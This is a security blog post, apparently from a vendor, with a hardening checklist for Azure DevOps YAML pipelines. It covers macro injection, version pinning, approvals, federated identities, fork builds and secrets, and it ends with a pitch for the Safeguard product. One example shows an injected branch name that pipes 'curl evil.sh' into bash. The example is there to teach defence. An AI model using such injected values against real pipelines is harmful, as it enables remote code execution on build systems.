Most of the Azure DevOps incidents I have been called into over the last two years did not start with a zero-day. They started with a YAML file that the author did not realize was a program with attacker-controlled input. YAML pipelines in Azure DevOps are powerful — variables interpolate at multiple stages, templates can be pulled from other repositories, and tasks run with the full context of whatever service connection the pipeline has been granted. Every one of those is a feature. Every one of those is also an exploit path if you wire it up without thinking about it.
This post is the hardening checklist I now walk through with platform teams during their first review. It assumes you are running pipelines/*.yml on the modern agent, using Azure Pipelines (not Classic), and that you have at least one production environment gated through an approval.
Why YAML Pipelines Are Not Just Config
The first mental shift a team has to make is that an Azure DevOps YAML pipeline is not configuration. It is a program. The YAML parser expands three different layers — template expressions evaluated at queue time (${{ }}), runtime expressions evaluated at job start ($[ ]), and macro syntax evaluated at task execution ($( )). Each layer has different trust boundaries, and if you mix them up, you hand an attacker a shell.
The canonical example is a pipeline that runs on pr triggers against forks and prints the branch name in a bash task:
- bash: echo "Building $(Build.SourceBranchName)"
That looks innocent. It is not. $(Build.SourceBranchName) is a macro expansion, and on a pull request from a fork, the branch name is attacker-controlled. A branch named main; curl evil.sh | bash runs. I have seen this exact pattern in production repositories at Fortune 500 companies. The fix is to quote the value and use an environment variable:
- bash: echo "Building $BRANCH"
env:
BRANCH: $(Build.SourceBranchName)
Environment variables do not expand shell metacharacters. Macros do.
Pinning Task Versions and Template Sources
The second-biggest category of incidents is mutable references. Azure DevOps tasks are versioned, but the default syntax — task: AzureCLI@2 — floats to the latest minor version within the @2 major. If the task publisher is compromised, or if the task is updated in a way that changes behavior, your pipelines pick up the change silently on the next run. This is the same supply chain risk as floating latest on a Docker image, and it is just as avoidable.
For any task outside the Microsoft-published set, pin the specific minor version. For Microsoft-published tasks, accept the @N floating version on non-production pipelines and pin on production ones. If you use the newer Marketplace extension tasks, also record the publisher identifier and review extension updates through the Azure DevOps extension management policy before they reach pipelines.
Templates are worse, because templates execute at queue time with the permissions of whoever triggered the pipeline. A template referenced from another repository like this:
resources:
repositories:
- repository: templates
type: git
name: Shared/Templates
ref: refs/heads/main
floats with main. Anyone who can push to Shared/Templates main can change every downstream pipeline. Pin to a commit SHA, not a branch, and rotate the pin through a pull request that runs its own review. This is the single control that has prevented the most real-world damage on the teams I work with.
Required Reviewers and Environment Approvals
Azure DevOps environments are underused. An environment in Azure DevOps is a deployment target with its own approval policy, and the approval policy is enforced by the service, not by YAML. That means a pipeline author cannot bypass an environment approval by editing the YAML — the approval is owned by the environment, not the pipeline.
For every production deployment target, create a named environment (prod-eastus, prod-eus2-payments, whatever your naming convention is) and attach a required approvers check. Set the minimum approvers to at least two for anything that touches customer data, and turn on the "approvers cannot approve their own runs" policy. That policy exists because the default lets a pipeline author approve their own deployment, which defeats the entire point of the approval.
Also turn on the "Exclusive lock" and "Business hours" checks where they fit. Exclusive lock prevents two runs from deploying to the same environment at the same time, which has caught more than one deployment-race bug in practice. Business hours checks prevent the 3 a.m. "quick hotfix" that bypasses reviewers because nobody is awake to object.
Service Connections and Federated Identity
The service connection is the single most valuable credential in an Azure DevOps organization. A contributor-scoped service connection to an Azure subscription is, effectively, contributor access to that subscription for anyone who can run a pipeline. Most organizations I review have at least one service connection scoped far too broadly — I regularly find Owner at the subscription level where Contributor on a single resource group would suffice.
Azure DevOps now supports workload identity federation for Azure service connections, and there is no good reason not to use it. Federated connections replace the long-lived client secret with an OIDC exchange against Azure AD, so there is no secret in the service connection to leak. Conversion is a few clicks in the service connection UI and a one-time consent in Azure AD. Every new service connection we stand up at the teams I advise is federated; the existing secret-based ones are on a rolling conversion plan.
Scope service connections to the smallest Azure resource they need — a single resource group, or a single storage account — and put the connection in a dedicated project with tight pipeline permissions. Cross-project usage should be explicit, not implicit.
Runtime Parameters and the PR From Fork Problem
The parameters section of a YAML pipeline lets callers pass typed values into the pipeline. This is useful for internal callers. It is dangerous for external callers, because on a pull request from a fork, the parameters are attacker-controlled. If a parameter is interpolated into a shell script without quoting, you have the same injection bug as the branch name example earlier.
The right pattern is to validate parameter values with the values field and to never interpolate a parameter directly into a shell. Example:
parameters:
- name: environment
type: string
values: [dev, staging, prod]
That restricts the parameter to one of three strings at queue time. Without values, the parameter accepts anything.
For PRs from forks, also turn off the "Automatically build pull requests" option on any pipeline that uses production service connections. The default builds forks with full pipeline permissions, which is almost never what you want. Require a manual comment trigger (/azp run) from a trusted maintainer instead, and only after a review of the PR's .azure-pipelines.yml diff.
Secrets, Variable Groups, and Key Vault
Variable groups backed by Azure Key Vault are strictly better than variable groups with inline secrets, because the secrets do not exist in Azure DevOps at all — they are pulled at job start time from Key Vault through the service connection. This means a compromised Azure DevOps organization does not, by itself, give you the secrets.
Mark any non-Key-Vault secret as "secret" in the variable group, and never echo a secret variable in a task. The agent redacts secrets from logs on a best-effort basis, but the redaction is string-match based, and a transformed secret (base64, URL-encoded) will not be redacted. This has caused several real leaks. If you have to pass a secret to a downstream system, pass it through an environment variable and a process argument, not through a logged command line.
How Safeguard Helps
Safeguard ingests Azure DevOps pipeline definitions and flags the exact patterns above — floating task versions, unpinned template references, macro expansions of attacker-controlled variables, and service connections scoped more broadly than the pipeline needs. The platform correlates those findings with the service connection's Azure role assignments, so a broadly-scoped connection in a weakly-gated pipeline surfaces as a single high-priority finding rather than two low-priority ones. For federated identity rollouts, Safeguard tracks which service connections are still secret-backed and prioritizes the conversion work by blast radius. The net effect is that the YAML hardening review stops being a quarterly manual pass and becomes a continuous control.